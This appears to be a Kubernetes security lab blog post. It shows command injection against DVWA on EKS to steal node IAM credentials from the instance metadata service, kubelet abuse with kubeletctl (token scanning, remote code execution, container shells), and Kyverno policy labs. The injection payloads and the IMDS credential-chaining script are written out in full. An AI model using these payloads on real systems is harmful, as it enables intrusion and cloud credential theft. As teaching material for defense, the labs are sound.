
In this post, I work through hands-on labs with Kyverno, a policy engine, and a few scenarios that can become security threats in Kubernetes.

Scenario: an EKS Pod abusing the IMDS API

1. Create a vulnerable web server Pod

cat <<EOT > mysql.yaml
apiVersion: v1
kind: Secret
metadata:
  name: dvwa-secrets
type: Opaque
data:
  # s3r00tpa55
  ROOT_PASSWORD: czNyMDB0cGE1NQ==
  # dvwa
  DVWA_USERNAME: ZHZ3YQ==
  # p@ssword
  DVWA_PASSWORD: cEBzc3dvcmQ=
  # dvwa
  DVWA_DATABASE: ZHZ3YQ==
---
apiVersion: v1
kind: Service
metadata:
  name: dvwa-mysql-service
spec:
  selector:
    app: dvwa-mysql
    tier: backend
  ports:
    - protocol: TCP
      port: 3306
      targetPort: 3306
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: dvwa-mysql
spec:
  replicas: 1
  selector:
    matchLabels:
      app: dvwa-mysql
      tier: backend
  template:
    metadata:
      labels:
        app: dvwa-mysql
        tier: backend
    spec:
      containers:
        - name: mysql
          image: mariadb:10.1
          resources:
            requests:
              cpu: "0.3"
              memory: 256Mi
            limits:
              cpu: "0.3"
              memory: 256Mi
          ports:
            - containerPort: 3306
          env:
            - name: MYSQL_ROOT_PASSWORD
              valueFrom:
                secretKeyRef:
                  name: dvwa-secrets
                  key: ROOT_PASSWORD
            - name: MYSQL_USER
              valueFrom:
                secretKeyRef:
                  name: dvwa-secrets
                  key: DVWA_USERNAME
            - name: MYSQL_PASSWORD
              valueFrom:
                secretKeyRef:
                  name: dvwa-secrets
                  key: DVWA_PASSWORD
            - name: MYSQL_DATABASE
              valueFrom:
                secretKeyRef:
                  name: dvwa-secrets
                  key: DVWA_DATABASE
EOT

kubectl apply -f mysql.yaml
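The values under `data:` in the Secret above must be base64-encoded, and the comment above each key is its plaintext. The following is a minimal sketch of how to produce those values in the shell. The helper name `b64` is hypothetical. Base64 is only an encoding, not encryption, so anyone who can read the Secret can recover the passwords.

```shell
#!/usr/bin/env bash
# Hypothetical helper: base64-encode a value for a Secret's data field.
# printf '%s' is used instead of echo so that no trailing newline gets encoded.
b64() {
  printf '%s' "$1" | base64
}

b64 's3r00tpa55'   # ROOT_PASSWORD                -> czNyMDB0cGE1NQ==
b64 'dvwa'         # DVWA_USERNAME / DVWA_DATABASE -> ZHZ3YQ==
b64 'p@ssword'     # DVWA_PASSWORD                -> cEBzc3dvcmQ=

# Decoding is just as easy (GNU coreutils syntax)
printf '%s' 'cEBzc3dvcmQ=' | base64 -d; echo
```

As an alternative, `kubectl create secret generic dvwa-secrets --from-literal=ROOT_PASSWORD=s3r00tpa55 ...` does the encoding for you.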

cat <<EOT > dvwa.yaml
apiVersion: v1
kind: ConfigMap
metadata:
  name: dvwa-config
data:
  RECAPTCHA_PRIV_KEY: ""
  RECAPTCHA_PUB_KEY: ""
  SECURITY_LEVEL: "low"
  PHPIDS_ENABLED: "0"
  PHPIDS_VERBOSE: "1"
  PHP_DISPLAY_ERRORS: "1"
---
apiVersion: v1
kind: Service
metadata:
  name: dvwa-web-service
spec:
  selector:
    app: dvwa-web
  type: ClusterIP
  ports:
    - protocol: TCP
      port: 80
      targetPort: 80
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: dvwa-web
spec:
  replicas: 1
  selector:
    matchLabels:
      app: dvwa-web
  template:
    metadata:
      labels:
        app: dvwa-web
    spec:
      containers:
        - name: dvwa
          image: cytopia/dvwa:php-8.1
          ports:
            - containerPort: 80
          resources:
            requests:
              cpu: "0.3"
              memory: 256Mi
            limits:
              cpu: "0.3"
              memory: 256Mi
          env:
            - name: RECAPTCHA_PRIV_KEY
              valueFrom:
                configMapKeyRef:
                  name: dvwa-config
                  key: RECAPTCHA_PRIV_KEY
            - name: RECAPTCHA_PUB_KEY
              valueFrom:
                configMapKeyRef:
                  name: dvwa-config
                  key: RECAPTCHA_PUB_KEY
            - name: SECURITY_LEVEL
              valueFrom:
                configMapKeyRef:
                  name: dvwa-config
                  key: SECURITY_LEVEL
            - name: PHPIDS_ENABLED
              valueFrom:
                configMapKeyRef:
                  name: dvwa-config
                  key: PHPIDS_ENABLED
            - name: PHPIDS_VERBOSE
              valueFrom:
                configMapKeyRef:
                  name: dvwa-config
                  key: PHPIDS_VERBOSE
            - name: PHP_DISPLAY_ERRORS
              valueFrom:
                configMapKeyRef:
                  name: dvwa-config
                  key: PHP_DISPLAY_ERRORS
            - name: MYSQL_HOSTNAME
              value: dvwa-mysql-service
            - name: MYSQL_DATABASE
              valueFrom:
                secretKeyRef:
                  name: dvwa-secrets
                  key: DVWA_DATABASE
            - name: MYSQL_USERNAME
              valueFrom:
                secretKeyRef:
                  name: dvwa-secrets
                  key: DVWA_USERNAME
            - name: MYSQL_PASSWORD
              valueFrom:
                secretKeyRef:
                  name: dvwa-secrets
                  key: DVWA_PASSWORD
EOT

kubectl apply -f dvwa.yaml

cat <<EOT > dvwa-ingress.yaml
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  annotations:
    alb.ingress.kubernetes.io/certificate-arn: $CERT_ARN
    alb.ingress.kubernetes.io/group.name: study
    alb.ingress.kubernetes.io/listen-ports: '[{"HTTPS":443}, {"HTTP":80}]'
    alb.ingress.kubernetes.io/load-balancer-name: myeks-ingress-alb
    alb.ingress.kubernetes.io/scheme: internet-facing
    alb.ingress.kubernetes.io/ssl-redirect: "443"
    alb.ingress.kubernetes.io/success-codes: 200-399
    alb.ingress.kubernetes.io/target-type: ip
  name: ingress-dvwa
spec:
  ingressClassName: alb
  rules:
    - host: dvwa.$MyDomain
      http:
        paths:
          - backend:
              service:
                name: dvwa-web-service
                port:
                  number: 80
            path: /
            pathType: Prefix
EOT

kubectl apply -f dvwa-ingress.yaml

echo -e "DVWA Web https://dvwa.$MyDomain"



2. Command Injection lab

# Confirm that commands can be executed
8.8.8.8 ; echo ; hostname
8.8.8.8 ; echo ; whoami

# Get an IMDSv2 token and copy it for the next steps
8.8.8.8 ; curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"
AQAEAA3WsWqT3dUXli_j0BRbKRL23U7uFhDdI-raC6Lfs6k8w7EFtQ==



# Get the name of the EC2 instance profile (IAM role)
8.8.8.8 ; curl -s -H "X-aws-ec2-metadata-token: AQAEAA3WsWqT3dUXli_j0BRbKRL23U7uFhDdI-raC6Lfs6k8w7EFtQ==" http://169.254.169.254/latest/meta-data/iam/security-credentials/

eksctl-myeks-nodegroup-ng1-NodeInstanceRole-rnFrzZHdTCV0



# Steal the EC2 instance profile (IAM role) credentials
8.8.8.8 ; curl -s -H "X-aws-ec2-metadata-token: AQAEAA3WsWqT3dUXli_j0BRbKRL23U7uFhDdI-raC6Lfs6k8w7EFtQ==" http://169.254.169.254/latest/meta-data/iam/security-credentials/eksctl-myeks-nodegroup-ng1-NodeInstanceRole-rnFrzZHdTCV0

# Many other commands can be executed as well

8.8.8.8; cat /etc/passwd

8.8.8.8; rm -rf /tmp/*


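The three injected IMDS payloads above follow the IMDSv2 flow. A `PUT` to `/latest/api/token` returns a session token, and every later `GET` must carry that token in the `X-aws-ec2-metadata-token` header. The following is a minimal sketch that chains the same three requests. The function name `imds_role_credentials` and the `IMDS_BASE` override are hypothetical, added only so the flow can be exercised offline. It works wherever the metadata endpoint is reachable, and that includes a compromised Pod in this lab.

```shell
#!/usr/bin/env bash
# Hypothetical helper chaining the IMDSv2 calls used in this lab.
# IMDS_BASE defaults to the link-local metadata endpoint (override is an assumption for testing).
imds_role_credentials() {
  local base="${IMDS_BASE:-http://169.254.169.254}"
  local token role

  # Step 1: request a session token (TTL 21600 s = 6 h), like the first payload
  token=$(curl -s -X PUT "$base/latest/api/token" \
    -H "X-aws-ec2-metadata-token-ttl-seconds: 21600") || return 1

  # Step 2: read the role name attached through the instance profile
  role=$(curl -s -H "X-aws-ec2-metadata-token: $token" \
    "$base/latest/meta-data/iam/security-credentials/") || return 1

  # Step 3: fetch that role's temporary credentials (JSON)
  curl -s -H "X-aws-ec2-metadata-token: $token" \
    "$base/latest/meta-data/iam/security-credentials/$role"
}
```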

- After changing DVWA Security to Medium and retrying → the `;`-chained payloads above no longer execute commands
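The `;` payloads work at Low and fail at Medium for a simple reason. At Low, DVWA appends the input to a `ping` command and hands it to a shell unchanged. As I understand DVWA's source, the Medium level only strips `&&` and `;` from the input. The following is a hypothetical offline simulation in the shell, not DVWA's PHP code, with `echo ping -c 4` standing in for the real ping. Medium filters with a blacklist and does not check that the input is an IP address, so it should not be read as a real fix.

```shell
#!/usr/bin/env bash
# Hypothetical simulation of DVWA's ping page; "echo ping -c 4" replaces the real ping.

# Low: user input is concatenated into a shell command as-is
low_level() {
  sh -c "echo ping -c 4 $1"
}

# Medium (assumed behavior): '&&' and ';' are removed before the command is built
medium_level() {
  local target="$1"
  target=${target//'&&'/}
  target=${target//';'/}
  sh -c "echo ping -c 4 $target"
}

low_level '8.8.8.8 ; echo INJECTED'     # two lines: the ping command, then INJECTED
medium_level '8.8.8.8 ; echo INJECTED'  # one line: ';' was stripped, so "echo INJECTED" became ping arguments
```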

Scenario: risks of weak kubelet authentication/authorization settings, using the kubeletctl tool



1. Check the kubelet API authentication and authorization settings on the node

# Check the node's kubelet API authentication/authorization settings
ssh ec2-user@$N1 cat /etc/kubernetes/kubelet/kubelet-config.json | jq
ssh ec2-user@$N1 cat /var/lib/kubelet/kubeconfig | yh

# Check which ports kubelet listens on
ssh ec2-user@$N1 sudo ss -tnlp | grep kubelet
LISTEN 0 4096 127.0.0.1:10248 0.0.0.0:* users:(("kubelet",pid=2940,fd=20))
LISTEN 0 4096 *:10250 *:* users:(("kubelet",pid=2940,fd=21))

2. Create a demo Pod

# Create an awscli Pod for the demo
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: myawscli
spec:
  #serviceAccountName: my-sa
  containers:
    - name: my-aws-cli
      image: amazon/aws-cli:latest
      command: ['sleep', '36000']
  restartPolicy: Never
  terminationGracePeriodSeconds: 0
EOF

# Use the Pod

kubectl exec -it myawscli -- aws sts get-caller-identity --query Arn

kubectl exec -it myawscli -- aws s3 ls

kubectl exec -it myawscli -- aws ec2 describe-instances --region ap-northeast-2 --output table --no-cli-pager

kubectl exec -it myawscli -- aws ec2 describe-vpcs --region ap-northeast-2 --output table --no-cli-pager

3. Install kubeletctl on bastion2

# Delete the existing kubeconfig (so bastion2 has no cluster credentials)
rm -rf ~/.kube

# Download
curl -LO https://github.com/cyberark/kubeletctl/releases/download/v1.11/kubeletctl_linux_amd64 && chmod a+x ./kubeletctl_linux_amd64 && mv ./kubeletctl_linux_amd64 /usr/local/bin/kubeletctl
kubeletctl version
kubeletctl help

# Set the node1 IP variable to the private IP of your own node1
N1=192.168.3.80   # example value

# Scan node1's IP
kubeletctl scan --cidr $N1/32

# Try calling the kubelet API on node1
curl -k https://$N1:10250/pods; echo
Unauthorized

4. Modify kubelet-config.json from bastion1

# Connect to node1
ssh ec2-user@$N1
-----------------------------
# Switch to weak authentication/authorization settings
sudo vi /etc/kubernetes/kubelet/kubelet-config.json
...
"authentication": {
  "anonymous": {
    "enabled": true
  ...
},
"authorization": {
  "mode": "AlwaysAllow",
...

# Restart kubelet
sudo systemctl restart kubelet
systemctl status kubelet
-----------------------------


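To spot the two settings changed above on other nodes, here is a rough heuristic check in the shell. The function name `check_kubelet_config` is hypothetical. It strips whitespace and matches strings instead of parsing the JSON, so treat it as a quick sketch; a real audit should parse the file, for example with `jq`. On the EKS-optimized AMI these fields are normally `"anonymous": {"enabled": false}` and `"mode": "Webhook"`. That is why the earlier curl returned `Unauthorized`.

```shell
#!/usr/bin/env bash
# Hypothetical heuristic: flag anonymous auth and AlwaysAllow in a kubelet config file.
# Whitespace is removed first so that formatting differences do not matter (not a JSON parser).
check_kubelet_config() {
  local flat findings=0
  flat=$(tr -d ' \t\n\r' < "$1")
  if printf '%s' "$flat" | grep -q '"anonymous":{"enabled":true'; then
    echo "WARN: anonymous authentication is enabled"
    findings=1
  fi
  if printf '%s' "$flat" | grep -q '"mode":"AlwaysAllow"'; then
    echo "WARN: authorization mode is AlwaysAllow"
    findings=1
  fi
  [ "$findings" -eq 0 ] && echo "OK: no insecure kubelet auth settings found"
  return "$findings"
}

# Usage on a node:
# check_kubelet_config /etc/kubernetes/kubelet/kubelet-config.json
```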

5. Use kubeletctl from bastion2

# List the Pods
curl -s -k https://$N1:10250/pods | jq

# Check the kubelet-config.json settings
curl -k https://$N1:10250/configz | jq

# Using kubeletctl
# Return kubelet's configuration
kubeletctl -s $N1 configz | jq

# Get list of pods on the node
kubeletctl -s $N1 pods

# Scans for nodes with opened kubelet API > Scans for all the tokens in a given Node
kubeletctl -s $N1 scan token

# Note: the steps below require the myawscli Pod to be running on worker node 1. They also work on nodes 2 and 3 if you modify their kubelet config the same way.

# Execute a command through the kubelet API: <namespace> / <pod name> / <container name>

curl -k https://$N1:10250/run/default/myawscli/my-aws-cli -d "cmd=aws --version"

# Scans for nodes with opened kubelet API > remote code execution on their containers

kubeletctl -s $N1 scan rce

# Run commands inside a container

kubeletctl -s $N1 exec "/bin/bash" -n default -p myawscli -c my-aws-cli

--------------------------------

export

aws --version

aws ec2 describe-vpcs --region ap-northeast-2 --output table --no-cli-pager

exit

--------------------------------

# Return resource usage metrics (such as container CPU, memory usage, etc.)

kubeletctl -s $N1 metrics




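`kubeletctl scan token` collects the service account tokens mounted into the node's Pods. These tokens are JWTs, so anyone can read their payload, the middle base64url-encoded segment, without a key, and it shows whose identity a stolen token carries. The payload typically holds the issuer, the expiry, and a `sub` claim of the form `system:serviceaccount:<namespace>:<name>`. The following is a minimal sketch. The function name `jwt_payload` is hypothetical, and it assumes GNU `base64 -d`.

```shell
#!/usr/bin/env bash
# Hypothetical helper: print the decoded payload (second segment) of a JWT.
# It only decodes; the signature is never verified.
jwt_payload() {
  local p
  # take the middle segment and map base64url characters back to standard base64
  p=$(printf '%s' "$1" | cut -d. -f2 | tr '_-' '/+')
  # restore the '=' padding that base64url omits
  case $(( ${#p} % 4 )) in
    2) p="$p==" ;;
    3) p="$p=" ;;
  esac
  printf '%s' "$p" | base64 -d
}

# Usage: jwt_payload "$TOKEN"   # TOKEN copied from the scan token output
```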

Kynerno



- K8S Native Policy Mgmt

- Mutating admission / Validating admission 정책을 쉽게 설정할 수 있는 Policy Engine

- Kyverno Rule 형식은 Match / Exclude를 이용하여 객체에 대해 구분

- 각 객체에 대한 Validate, Mutate, Generate, Verify Images 기능 제공

Installation and labs

1. Install

# Install
# Notes for EKS: https://kyverno.io/docs/installation/platform-notes/#notes-for-eks-users
# Monitoring reference: https://kyverno.io/docs/monitoring/
cat << EOF > kyverno-value.yaml
config:
  resourceFiltersExcludeNamespaces: [ kube-system ]
admissionController:
  serviceMonitor:
    enabled: true
backgroundController:
  serviceMonitor:
    enabled: true
cleanupController:
  serviceMonitor:
    enabled: true
reportsController:
  serviceMonitor:
    enabled: true
EOF

kubectl create ns kyverno

helm repo add kyverno https://kyverno.github.io/kyverno/

helm install kyverno kyverno/kyverno --version 3.2.0-rc.3 -f kyverno-value.yaml -n kyverno

# Verify





kubectl get all -n kyverno

kubectl get crd | grep kyverno

kubectl get pod,svc -n kyverno





2. Prometheus / Grafana dashboard setup

3. Validation lab: a Pod can be created only if it has a non-empty "team" label

# Apply the ClusterPolicy
kubectl create -f- << EOF
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: require-labels
spec:
  validationFailureAction: Enforce
  rules:
  - name: check-team
    match:
      any:
      - resources:
          kinds:
          - Pod
    validate:
      message: "label 'team' is required"
      pattern:
        metadata:
          labels:
            team: "?*"
EOF

# Verify



kubectl get validatingwebhookconfigurations

kubectl get ClusterPolicy
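In the policy above, `team: "?*"` uses Kyverno's wildcards: `?` matches exactly one character and `*` matches zero or more. The label must therefore exist and have a non-empty value, and a Pod with no `team` label at all fails because the pattern's path is missing. Bash's `[[ ... == pattern ]]` glob matching uses the same two wildcards. The following rough local analogy is not Kyverno's code, and the function name is hypothetical.

```shell
#!/usr/bin/env bash
# Hypothetical analogy for the Kyverno pattern  team: "?*"
# ? = exactly one character, * = zero or more characters  =>  any non-empty value
matches_team_pattern() {
  [[ $1 == ?* ]]
}

for v in backend a ""; do
  if matches_team_pattern "$v"; then echo "'$v' -> pass"; else echo "'$v' -> fail"; fi
done
```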

# Try creating a Deployment

kubectl create deployment nginx --image=nginx

error: failed to create deployment: admission webhook "validate.kyverno.svc-fail" denied the request:

resource Deployment/default/nginx was blocked due to the following policies

require-labels:

autogen-check-team: 'validation error: label ''team'' is required. rule autogen-check-team

failed at path /spec/template/metadata/labels/team/'

# Create a Pod that has the team label



kubectl run nginx --image nginx --labels team=backend

kubectl get pod -l team=backend
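The earlier `kubectl create deployment` was rejected by `autogen-check-team`. Kyverno automatically derives rules for Pod controllers such as Deployments and checks the Pod template at `/spec/template/metadata/labels`, so a Deployment passes only if the label is on the template. The following sketch writes such a manifest. The file name `nginx-team.yaml` and the label value `backend` are arbitrary examples, and the cluster command is left commented out.

```shell
#!/usr/bin/env bash
# Write a Deployment whose Pod template carries the team label (example values).
cat <<'EOF' > nginx-team.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  name: nginx
spec:
  replicas: 1
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
        team: backend   # checked by autogen-check-team at /spec/template/metadata/labels/team
    spec:
      containers:
        - name: nginx
          image: nginx
EOF

# With the require-labels policy still in place:
# kubectl apply -f nginx-team.yaml
```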

# Verify

kubectl get policyreport -o wide

NAME                                   KIND   NAME    PASS   FAIL   WARN   ERROR   SKIP   AGE
e1073f10-84ef-4999-9651-9983c49ea76a   Pod    nginx   1      0      0      0       0      29s

kubectl get policyreport e1073f10-84ef-4999-9651-9983c49ea76a -o yaml | kubectl neat | yh

apiVersion: wgpolicyk8s.io/v1alpha2
kind: PolicyReport
metadata:
  labels:
    app.kubernetes.io/managed-by: kyverno
  name: e1073f10-84ef-4999-9651-9983c49ea76a
  namespace: default
results:
- message: validation rule 'check-team' passed.
  policy: require-labels
  result: pass
  rule: check-team
  scored: true
  source: kyverno
  timestamp:
    nanos: 0
    seconds: 1712473900
scope:
  apiVersion: v1
  kind: Pod
  name: nginx
  namespace: default
  uid: e1073f10-84ef-4999-9651-9983c49ea76a
summary:
  error: 0
  fail: 0
  pass: 1
  skip: 0
  warn: 0

# Delete the policy

kubectl delete clusterpolicy require-labels

4. Mutation lab: add the label "team=bravo" when a Pod is created

# Apply the ClusterPolicy
kubectl create -f- << EOF
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: add-labels
spec:
  rules:
  - name: add-team
    match:
      any:
      - resources:
          kinds:
          - Pod
    mutate:
      patchStrategicMerge:
        metadata:
          labels:
            +(team): bravo
EOF

# Verify



kubectl get mutatingwebhookconfigurations

kubectl get ClusterPolicy

# Create a Pod and check its labels



kubectl run redis --image redis

kubectl get pod redis --show-labels

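# Create a Pod that already has team=alpha and check its labels. How does this differ from the previous case? The +(team) add anchor only adds the label when it is missing, so team=alpha is kept.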

kubectl run newredis --image redis -l team=alpha

kubectl get pod newredis --show-labels

# Delete

kubectl delete clusterpolicy add-labels





5. Generation lab: automatically clone a Secret into every newly created namespace

# First, create this Kubernetes Secret in your cluster which will simulate a real image pull secret.
kubectl -n default create secret docker-registry regcred \
  --docker-server=myinternalreg.corp.com \
  --docker-username=john.doe \
  --docker-password=Passw0rd123! \
  --docker-email=john.doe@corp.com

# Check the source Secret
kubectl get secret regcred

# Create the ClusterPolicy
kubectl create -f- << EOF
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: sync-secrets
spec:
  rules:
  - name: sync-image-pull-secret
    match:
      any:
      - resources:
          kinds:
          - Namespace
    generate:
      apiVersion: v1
      kind: Secret
      name: regcred
      namespace: "{{request.object.metadata.name}}"
      synchronize: true
      clone:
        namespace: default
        name: regcred
EOF

# Check the policy
kubectl get ClusterPolicy

# Create a new namespace and check that regcred was cloned into it
kubectl create ns mytestns
kubectl -n mytestns get secret

# Delete

kubectl delete clusterpolicy sync-secrets
